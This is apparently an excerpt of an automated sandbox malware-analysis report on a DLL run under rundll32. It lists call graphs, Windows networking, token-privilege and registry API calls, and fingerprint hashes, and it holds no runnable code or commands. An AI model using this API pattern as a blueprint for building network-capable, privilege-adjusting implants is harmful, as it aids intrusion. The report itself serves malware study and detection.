LoadLibraryA codecvt 21417->21504 21419 6cd52080 3 API calls 21418->21419 21445 6cd7420f 21419->21445 21421 6cd7422f 21505 6cd75300 LoadLibraryA LoadLibraryA LoadLibraryA codecvt 21421->21505 21423 6cd74240 21506 6cd75300 LoadLibraryA LoadLibraryA LoadLibraryA codecvt 21423->21506 21424 6cd74d86 21424->21390 21426 6cd71c40 4 API calls 21426->21424 21427 6cd74251 codecvt 21507 6cd6eac0 LoadLibraryA LoadLibraryA LoadLibraryA codecvt 21427->21507 21429 6cd742d5 codecvt 21508 6cd6eac0 LoadLibraryA LoadLibraryA LoadLibraryA codecvt 21429->21508 21431 6cd74357 codecvt 21509 6cd6eac0 LoadLibraryA LoadLibraryA LoadLibraryA codecvt 21431->21509 21433 6cd743ee codecvt 21510 6cd6eac0 LoadLibraryA 
LoadLibraryA LoadLibraryA codecvt 21433->21510 21435 6cd54860 3 API calls 21449 6cd7447c codecvt 21435->21449 21437 6cd7455a 21438 6cd52080 3 API calls 21437->21438 21438->21445 21441 6cd74592 21443 6cd52080 3 API calls 21441->21443 21442 6cd52080 3 API calls 21442->21449 21443->21445 21445->21424 21445->21426 21446 6cd74651 codecvt 21515 6cd74d90 LoadLibraryA LoadLibraryA LoadLibraryA codecvt 21446->21515 21448 6cd54930 LoadLibraryA LoadLibraryA LoadLibraryA 21448->21449 21449->21435 21449->21437 21449->21441 21449->21442 21449->21445 21449->21446 21449->21448 21450 6cd75300 LoadLibraryA LoadLibraryA LoadLibraryA 21449->21450 21511 6cd75220 LoadLibraryA LoadLibraryA LoadLibraryA codecvt 21449->21511 21512 6cd75130 LoadLibraryA LoadLibraryA LoadLibraryA codecvt 21449->21512 21513 6cd75290 LoadLibraryA LoadLibraryA LoadLibraryA codecvt 21449->21513 21514 6cd74d90 LoadLibraryA LoadLibraryA LoadLibraryA codecvt 21449->21514 21450->21449 21451 6cd7472f codecvt 21451->21445 21516 6cd74d90 LoadLibraryA LoadLibraryA LoadLibraryA codecvt 21451->21516 21453 6cd74790 codecvt 21453->21445 21517 6cd74d90 LoadLibraryA LoadLibraryA LoadLibraryA codecvt 21453->21517 21455 6cd747f1 codecvt 21455->21445 21518 6cd74d90 LoadLibraryA LoadLibraryA LoadLibraryA codecvt 21455->21518 21457 6cd74852 codecvt 21457->21445 21519 6cd74d90 LoadLibraryA LoadLibraryA LoadLibraryA codecvt 21457->21519 21459 6cd748b3 codecvt 21459->21445 21460 6cd7493f 21459->21460 21461 6cd748de 21459->21461 21462 6cd749a6 21460->21462 21463 6cd74a4b 21460->21463 21464 6cd70070 3 API calls 21461->21464 21465 6cd70070 3 API calls 21462->21465 21467 6cd74a55 21463->21467 21468 6cd74b99 21463->21468 21466 6cd748ec 21464->21466 21469 6cd749b4 21465->21469 21470 6cd70110 3 API calls 21466->21470 21467->21445 21473 6cd70070 3 API calls 21467->21473 21472 6cd70070 3 API calls 21468->21472 21492 6cd74a30 21468->21492 21478 6cd70110 3 API calls 21469->21478 21471 6cd7492a 21470->21471 21475 6cd73a50 3 API calls 
21471->21475 21476 6cd74bad 21472->21476 21477 6cd74a95 21473->21477 21475->21445 21479 6cd70110 3 API calls 21476->21479 21520 6cd54090 LoadLibraryA LoadLibraryA LoadLibraryA 21477->21520 21478->21492 21479->21492 21481 6cd74c24 21483 6cd52080 3 API calls 21481->21483 21482 6cd74b4e 21486 6cd70110 3 API calls 21482->21486 21483->21445 21484 6cd74c3a 21484->21445 21490 6cd52210 4 API calls 21484->21490 21485 6cd70070 3 API calls 21485->21492 21488 6cd74b8c 21486->21488 21521 6cd73b60 LoadLibraryA LoadLibraryA LoadLibraryA 21488->21521 21490->21484 21491 6cd70110 3 API calls 21491->21492 21492->21481 21492->21484 21492->21485 21492->21491 21522 6cd71bd0 LoadLibraryA LoadLibraryA LoadLibraryA codecvt 21492->21522 21523 6cd54090 LoadLibraryA LoadLibraryA LoadLibraryA 21492->21523 21524 6cd73c50 LoadLibraryA LoadLibraryA LoadLibraryA 21492->21524 21495 6cd71c8a InternetCloseHandle 21494->21495 21496 6cd71c4f codecvt 21494->21496 21495->21392 21497 6cd531d0 codecvt 3 API calls 21496->21497 21498 6cd71c7a codecvt 21497->21498 21498->21495 21500 6cd751ea HttpOpenRequestA 21499->21500 21501 6cd751af codecvt 21499->21501 21500->21416 21502 6cd531d0 codecvt 3 API calls 21501->21502 21503 6cd751da codecvt 21502->21503 21503->21500 21504->21421 21505->21423 21506->21427 21507->21429 21508->21431 21509->21433 21510->21449 21511->21449 21512->21449 21513->21449 21514->21449 21515->21451 21516->21453 21517->21455 21518->21457 21519->21459 21520->21482 21521->21492 21522->21492 21523->21492 21524->21492 21526 6cd72bba bind 21525->21526 21527 6cd72b7f codecvt 21525->21527 21526->20778 21528 6cd531d0 codecvt 3 API calls 21527->21528 21529 6cd72baa codecvt 21528->21529 21529->21526 21531 6cd72d5a ioctlsocket 21530->21531 21532 6cd72d1f codecvt 21530->21532 21531->20783 21533 6cd531d0 codecvt 3 API calls 21532->21533 21534 6cd72d4a codecvt 21533->21534 21534->21531 21535->20763 20366 6cd736f2 Sleep LoadLibraryA LoadLibraryA LoadLibraryA 20367 6cd74513 LoadLibraryA LoadLibraryA 
LoadLibraryA InternetCloseHandle 21985 6cd64f00 LoadLibraryA LoadLibraryA LoadLibraryA FindCloseChangeNotification codecvt 21806 6cd7450c 5 API calls codecvt 21987 6cd5ad09 7 API calls codecvt 21989 6cd75d30 12 API calls codecvt 21991 6cd77130 RtlAllocateHeap LoadLibraryA LoadLibraryA LoadLibraryA VirtualAlloc 21999 6cd5632e 5 API calls codecvt

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000001E.00000002.3965809546.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 0000001E.00000002.3965781157.000000006CD50000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965841046.000000006CD78000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965860803.000000006CD7D000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965890619.000000006CDD7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965911426.000000006CDEA000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_30_2_6cd50000_rundll32.jbxd
                              Similarity
                              • API ID: CountTick$Sleep
                              • String ID: F$d
                              • API String ID: 4250438611-811691143
                              • Opcode ID: a098e7f8e63afde0cfcad1b01a541da313c866a3f0ed59b293527f0a8b3f9828
                              • Instruction ID: 5741d3671f550c46167cfbcedb5e4d7b338e2c59d17bfafe5065f546fc8f0359
                              • Opcode Fuzzy Hash: a098e7f8e63afde0cfcad1b01a541da313c866a3f0ed59b293527f0a8b3f9828
                              • Instruction Fuzzy Hash: 54015A30E04298EFDF04EFACCA0529DBB71FF02315F5082AAD921A2654DB75CA61EB51

                              Control-flow Graph

                              APIs
                              • AdjustTokenPrivileges.KERNELBASE(00000028,?,?,?,?,?,00000028,00000000), ref: 6CD665E2
                              Memory Dump Source
                              • Source File: 0000001E.00000002.3965809546.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 0000001E.00000002.3965781157.000000006CD50000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965841046.000000006CD78000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965860803.000000006CD7D000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965890619.000000006CDD7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965911426.000000006CDEA000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_30_2_6cd50000_rundll32.jbxd
                              Similarity
                              • API ID: AdjustPrivilegesToken
                              • String ID:
                              • API String ID: 2874748243-0
                              • Opcode ID: fedf07aa14fbab5e5a77c0bbc80ca200d2b8c814a5129c1e9c60e8885f5a4d10
                              • Instruction ID: 4eac245e379327e1e83174ec7c3874499f21827dd16576a9ee06b3752f063660
                              • Opcode Fuzzy Hash: fedf07aa14fbab5e5a77c0bbc80ca200d2b8c814a5129c1e9c60e8885f5a4d10
                              • Instruction Fuzzy Hash: C9F068B5600209BBDF04EF64DC81EDF37B8AB45705F404119B90593750DB30A569C7F5
                              APIs
                              • recv.WS2_32(00001000,?,?,?,00001000,00000004,6CDDA060), ref: 6CD72E3A
                              Memory Dump Source
                              • Source File: 0000001E.00000002.3965809546.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 0000001E.00000002.3965781157.000000006CD50000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965841046.000000006CD78000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965860803.000000006CD7D000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965890619.000000006CDD7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965911426.000000006CDEA000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_30_2_6cd50000_rundll32.jbxd
                              Similarity
                              • API ID: recv
                              • String ID:
                              • API String ID: 1507349165-0
                              • Opcode ID: 9fd7155af1e7722e26ba3d95c0bdafb807698a076085ba7c63eb77a770bae0bf
                              • Instruction ID: 361a71825b4224b9111fa012168117e9633dcfcd24ef7344b1946d8a302c08fc
                              • Opcode Fuzzy Hash: 9fd7155af1e7722e26ba3d95c0bdafb807698a076085ba7c63eb77a770bae0bf
                              • Instruction Fuzzy Hash: 2BF05475A4060CBBDF00DFA4DC85E9B37BCAB46605F404658F90657A60EB30A9688BB5
                              APIs
                              • bind.WS2_32(00000003,?,?,00000003,00000000), ref: 6CD72BC6
                              Memory Dump Source
                              • Source File: 0000001E.00000002.3965809546.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 0000001E.00000002.3965781157.000000006CD50000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965841046.000000006CD78000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965860803.000000006CD7D000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965890619.000000006CDD7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965911426.000000006CDEA000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_30_2_6cd50000_rundll32.jbxd
                              Similarity
                              • API ID: bind
                              • String ID:
                              • API String ID: 1187836755-0
                              • Opcode ID: e9aa97cc8f4d94d5d2c29697871ee939479c27c2a0e00f375e31cf3617e841ec
                              • Instruction ID: d2a65e8af8d810e2f310fcceaf937a03f4f1e62f3dddd44310b31814cae01de2
                              • Opcode Fuzzy Hash: e9aa97cc8f4d94d5d2c29697871ee939479c27c2a0e00f375e31cf3617e841ec
                              • Instruction Fuzzy Hash: 47F08275E04204BBDF10EF64DC44FAE77BDAB45219F404719FD05926A0EB3065A887A1

                              Control-flow Graph

                              Control-flow graph of the function at 6cd52c90-6cd531ce (rendered from basic-block data in the interactive report; the executed/not-executed colouring and the raw block listing are omitted here). The function is a ladder of conditional blocks, each calling 6cd54a80, 6cd51fe0 and 6cd54bf0 (three of them also call LoadLibraryA), and every branch converges on the exit block at 6cd531c6-6cd531ce.
                              Memory Dump Source
                              • Source File: 0000001E.00000002.3965809546.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 0000001E.00000002.3965781157.000000006CD50000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965841046.000000006CD78000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965860803.000000006CD7D000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965890619.000000006CDD7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965911426.000000006CDEA000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_30_2_6cd50000_rundll32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 5e1892ad7e4fc7dda663b5a1bbdcfd5af4397b97d278706df5c6e3228e46f3c4
                              • Instruction ID: 8adcfee697f6201d50e44eb6757f91f10167bde8f8e61a10de3c97f86793617b
                              • Opcode Fuzzy Hash: 5e1892ad7e4fc7dda663b5a1bbdcfd5af4397b97d278706df5c6e3228e46f3c4
                              • Instruction Fuzzy Hash: D3D17D74A09208EBDF549F70CC59EDD3BB4BF05348F80451AE40A6BBB0DB34956DCAA5

                              Control-flow Graph

                              APIs
                              • HttpOpenRequestA.WININET(84400100,?,?,?,?,?,?,?,84400100,00000000), ref: 6CD7520A
                              Strings
                              Memory Dump Source
                              • Source File: 0000001E.00000002.3965809546.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 0000001E.00000002.3965781157.000000006CD50000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965841046.000000006CD78000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965860803.000000006CD7D000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965890619.000000006CDD7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965911426.000000006CDEA000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_30_2_6cd50000_rundll32.jbxd
                              Similarity
                              • API ID: HttpOpenRequest
                              • String ID: @<t
                              • API String ID: 1984915467-2873137160
                              • Opcode ID: 424d0214629a035d7647091a390d7d5ec3ed93fb3636c6658290d5c813b5ebd4
                              • Instruction ID: ca02d6d7127a81aa2c04ebc5476531a065f3f949b162a9b992578c9b28c2a703
                              • Opcode Fuzzy Hash: 424d0214629a035d7647091a390d7d5ec3ed93fb3636c6658290d5c813b5ebd4
                              • Instruction Fuzzy Hash: 52011D71610108BBDF44DF94DC90EDE37B8AB4C245F404618FA0993661DB30E9688BB1

                              Control-flow Graph

                              APIs
                              • CreateWindowExW.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CD63D8A
                              Memory Dump Source
                              • Source File: 0000001E.00000002.3965809546.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 0000001E.00000002.3965781157.000000006CD50000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965841046.000000006CD78000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965860803.000000006CD7D000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965890619.000000006CDD7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965911426.000000006CDEA000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_30_2_6cd50000_rundll32.jbxd
                              Similarity
                              • API ID: CreateWindow
                              • String ID:
                              • API String ID: 716092398-0
                              • Opcode ID: 8758094739b1d243a1e6ffb5428a0c2240210853efe9421867af52fdb646f657
                              • Instruction ID: a6e42aaa3ad6eb6b3af3e6a345305df2a0765774631167e01b54b63b4ed4b9b0
                              • Opcode Fuzzy Hash: 8758094739b1d243a1e6ffb5428a0c2240210853efe9421867af52fdb646f657
                              • Instruction Fuzzy Hash: A0011E76604108ABDB44DF98DC90EDA37BCAB9C344F444608FA0997650D730E865CBA0

                              Control-flow Graph

                              APIs
                              • WSAIoctl.WS2_32(6CD6BECA,?,?,?,?,?,?,?,?,6CD6BECA,?), ref: 6CD76E6E
                              Memory Dump Source
                              • Source File: 0000001E.00000002.3965809546.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 0000001E.00000002.3965781157.000000006CD50000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965841046.000000006CD78000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965860803.000000006CD7D000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965890619.000000006CDD7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965911426.000000006CDEA000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_30_2_6cd50000_rundll32.jbxd
                              Similarity
                              • API ID: Ioctl
                              • String ID:
                              • API String ID: 3041054344-0
                              • Opcode ID: 5c5d63d91a6ec1144f6fe3cd630928e5713814d3a19cfa311989323e8be02769
                              • Instruction ID: 8574da47fb506351b4b7aee2c11e2fd36cdaaba072f5b60661fb8c0ed85a4333
                              • Opcode Fuzzy Hash: 5c5d63d91a6ec1144f6fe3cd630928e5713814d3a19cfa311989323e8be02769
                              • Instruction Fuzzy Hash: 0D01FF76604108ABDB44DFA8EC55EEF37BCAB4C304F404618FA09D3654E730E82587B1

                              Control-flow Graph

                              APIs
                              • RegCreateKeyExW.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000,00000000,6CDB84A4,00000001), ref: 6CD5D8DE
                              Memory Dump Source
                              • Source File: 0000001E.00000002.3965809546.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 0000001E.00000002.3965781157.000000006CD50000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965841046.000000006CD78000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965860803.000000006CD7D000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965890619.000000006CDD7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965911426.000000006CDEA000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_30_2_6cd50000_rundll32.jbxd
                              Similarity
                              • API ID: Create
                              • String ID:
                              • API String ID: 2289755597-0
                              • Opcode ID: acfdec4c8498841cc8befef09584d0fc18bd5668d8c17df83e3ee386338fe814
                              • Instruction ID: 496ca4c92e5df9aa427a6f00ad463cad4830b33d5325db5ecf39f457e2bab333
                              • Opcode Fuzzy Hash: acfdec4c8498841cc8befef09584d0fc18bd5668d8c17df83e3ee386338fe814
                              • Instruction Fuzzy Hash: 22014F76604109ABDB04DFA4DC40EEB77F9AB5C305F408218BA0993650DB31E869CBB1

                              Control-flow Graph

                              APIs
                              • InternetConnectA.WININET(00000000,?,?,?,?,?,?,?,00000000,00000000), ref: 6CD7511B
                              Memory Dump Source
                              • Source File: 0000001E.00000002.3965809546.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 0000001E.00000002.3965781157.000000006CD50000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965841046.000000006CD78000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965860803.000000006CD7D000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965890619.000000006CDD7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 0000001E.00000002.3965911426.000000006CDEA000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_30_2_6cd50000_rundll32.jbxd
                              Similarity
                              • API ID: ConnectInternet
                              • String ID:
                              • API String ID: 3050416762-0
                              • Opcode ID: 7aafd13f0ecc5bd0459b103740a10e6e1ab8b87677cfef5f0ee6351af256416c
                              • Instruction ID: e8b1bc96e91760d0b1747511f85559117fb821f3a9cff0a85b622be511c32db2
                              • Opcode Fuzzy Hash: 7aafd13f0ecc5bd0459b103740a10e6e1ab8b87677cfef5f0ee6351af256416c
                              • Instruction Fuzzy Hash: FC013671604108BBDF54DF94DC40EEA37FCAF8C214F404118BA0993661DB30D9A5C7B1

                              Control-flow Graph

                              APIs
                              • RegEnumValueA.KERNEL32(00000000,?,?,?,?,?,?,?,00000000,00000000), ref: 6CD719FA
                              Memory Dump Source
                              • Source File: 0000001E.00000002.3965809546.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                               • Associated: 0000001E.00000002.3965781157.000000006CD50000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 0000001E.00000002.3965841046.000000006CD78000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 0000001E.00000002.3965860803.000000006CD7D000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 0000001E.00000002.3965890619.000000006CDD7000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 0000001E.00000002.3965911426.000000006CDEA000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_30_2_6cd50000_rundll32.jbxd
                              Similarity
                              • API ID: EnumValue
                              • String ID:
                              • API String ID: 2814608202-0
                              • Opcode ID: 32f016aa9835caad0ed8e313f40a69c7de39141be8595ce0e359f600961f7ba0
                              • Instruction ID: 538bf54d47a3bd399f4bf3b03e09ff1efe3eb231f81bf7c10c593280ba4eb536
                              • Opcode Fuzzy Hash: 32f016aa9835caad0ed8e313f40a69c7de39141be8595ce0e359f600961f7ba0
                              • Instruction Fuzzy Hash: A0011D75A04108AFDF14DFA5DC50EAF37B9AB48204F404619F90993660DB31E8658BB6

                              APIs
                              • WSARecv.WS2_32(?,?,?,?,?,?,?), ref: 6CD77046
                              Memory Dump Source
                              • Source File: 0000001E.00000002.3965809546.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                               • Associated: 0000001E.00000002.3965781157.000000006CD50000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 0000001E.00000002.3965841046.000000006CD78000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 0000001E.00000002.3965860803.000000006CD7D000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 0000001E.00000002.3965890619.000000006CDD7000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 0000001E.00000002.3965911426.000000006CDEA000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_30_2_6cd50000_rundll32.jbxd
                              Similarity
                              • API ID: Recv
                              • String ID:
                              • API String ID: 4192927123-0
                              • Opcode ID: 47a89e131fb807f74a25aa1910f1fe587597ee51f75f0fb14b49d1b9a4eae39f
                              • Instruction ID: dbbc2fba1a899d3effd75d18611680b7f54d91aaa209390cb039885e56277640
                              • Opcode Fuzzy Hash: 47a89e131fb807f74a25aa1910f1fe587597ee51f75f0fb14b49d1b9a4eae39f
                              • Instruction Fuzzy Hash: 32F01D7260410CAFDF50DF94DC55E9F37BCAB58209F804618FA0593660EB30992987A1

                              APIs
                              • WSASend.WS2_32(?,?,?,?,?,?,?,?,00000000), ref: 6CD76FC6
                              Memory Dump Source
                              • Source File: 0000001E.00000002.3965809546.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                               • Associated: 0000001E.00000002.3965781157.000000006CD50000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 0000001E.00000002.3965841046.000000006CD78000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 0000001E.00000002.3965860803.000000006CD7D000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 0000001E.00000002.3965890619.000000006CDD7000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 0000001E.00000002.3965911426.000000006CDEA000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_30_2_6cd50000_rundll32.jbxd
                              Similarity
                              • API ID: Send
                              • String ID:
                              • API String ID: 121738739-0
                              • Opcode ID: bb3c1827df35d59f2896ab6857aabaaa57f6e8fa95a4954fb345f56ab8ff8799
                              • Instruction ID: f3dda8538591f89589e3bd505f98714151a908c3fa7467dba12fa1bd20693993
                              • Opcode Fuzzy Hash: bb3c1827df35d59f2896ab6857aabaaa57f6e8fa95a4954fb345f56ab8ff8799
                              • Instruction Fuzzy Hash: 0CF04471604108BBDF40DF94DC55E9E77BCAB59305F408619BA09D3654EB30A8298BB1

                              APIs
                              • DnsQuery_A.DNSAPI(6CDD6EF4,?,?,?,?,?,6CDD6EF4,00000000,6CD70D49,6CDD6EF4,00000004), ref: 6CD71D03
                              Memory Dump Source
                              • Source File: 0000001E.00000002.3965809546.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                               • Associated: 0000001E.00000002.3965781157.000000006CD50000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 0000001E.00000002.3965841046.000000006CD78000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 0000001E.00000002.3965860803.000000006CD7D000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 0000001E.00000002.3965890619.000000006CDD7000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 0000001E.00000002.3965911426.000000006CDEA000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_30_2_6cd50000_rundll32.jbxd
                              Similarity
                              • API ID: Query_
                              • String ID:
                              • API String ID: 428220571-0
                              • Opcode ID: b49771f30c5ab727173e1122b90ad82651215b1994b39f7099055bebafe149a4
                              • Instruction ID: 060fcf6945d1ef780af0f8b58fcef8c97e33c0d59adf0ef7b2dd32bc1b9393a4
                              • Opcode Fuzzy Hash: b49771f30c5ab727173e1122b90ad82651215b1994b39f7099055bebafe149a4
                              • Instruction Fuzzy Hash: 6AF06275A04108BBDB40DFA4DCA1EEF37BCAB44204F408619FD0592690DB31A569C7B2

                              APIs
                              • CreateThread.KERNEL32(00000000,?,?,?,?,?,00000000,6CD512EE,?,6CD512EE,?,6CD7D944,00000001,6CD7D96C,00000001), ref: 6CD5F872
                              Memory Dump Source
                              • Source File: 0000001E.00000002.3965809546.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                               • Associated: 0000001E.00000002.3965781157.000000006CD50000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 0000001E.00000002.3965841046.000000006CD78000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 0000001E.00000002.3965860803.000000006CD7D000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 0000001E.00000002.3965890619.000000006CDD7000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 0000001E.00000002.3965911426.000000006CDEA000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_30_2_6cd50000_rundll32.jbxd
                              Similarity
                              • API ID: CreateThread
                              • String ID:
                              • API String ID: 2422867632-0
                              • Opcode ID: 4d3a64b8217893de9cd0f61d7c94298aafc672fc4a5b6e50d39c323aacc1e9a8
                              • Instruction ID: 979335e7a4f8dfdae56f86856e92dfd92579cb9b216b68e3b2a490875e5f4799
                              • Opcode Fuzzy Hash: 4d3a64b8217893de9cd0f61d7c94298aafc672fc4a5b6e50d39c323aacc1e9a8
                              • Instruction Fuzzy Hash: A0F06276604108BBDF44DFE4EC40EAE77F8AB48244F404618BA06D7650EB30A9298BB6

                              APIs
                              • GetTokenInformation.KERNELBASE(00020008,?,?,?,?,00020008,00000000), ref: 6CD6678E
                              Memory Dump Source
                              • Source File: 0000001E.00000002.3965809546.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                               • Associated: 0000001E.00000002.3965781157.000000006CD50000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 0000001E.00000002.3965841046.000000006CD78000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 0000001E.00000002.3965860803.000000006CD7D000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 0000001E.00000002.3965890619.000000006CDD7000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 0000001E.00000002.3965911426.000000006CDEA000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_30_2_6cd50000_rundll32.jbxd
                              Similarity
                              • API ID: InformationToken
                              • String ID:
                              • API String ID: 4114910276-0
                              • Opcode ID: 09f3feb31454465134d6eba986473de9ba659495414c8f6808809418e13ebd85
                              • Instruction ID: 800fc8f85ec53e6ae812986bba2fa9ec41e210d03fa8e0dab2e0eac03ea6014e
                              • Opcode Fuzzy Hash: 09f3feb31454465134d6eba986473de9ba659495414c8f6808809418e13ebd85
                              • Instruction Fuzzy Hash: 20F01DB6A00209ABDF14DFA4DC81EAE77B8AB08215F404519FA0697A60DB30996987B5
                              APIs
                              • InternetOpenA.WININET(00000000,?,?,?,?,00000000,00001000), ref: 6CD71B4E
                              Memory Dump Source
                              • Source File: 0000001E.00000002.3965809546.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                               • Associated: 0000001E.00000002.3965781157.000000006CD50000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 0000001E.00000002.3965841046.000000006CD78000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 0000001E.00000002.3965860803.000000006CD7D000.00000004.00000001.01000000.00000003.sdmp
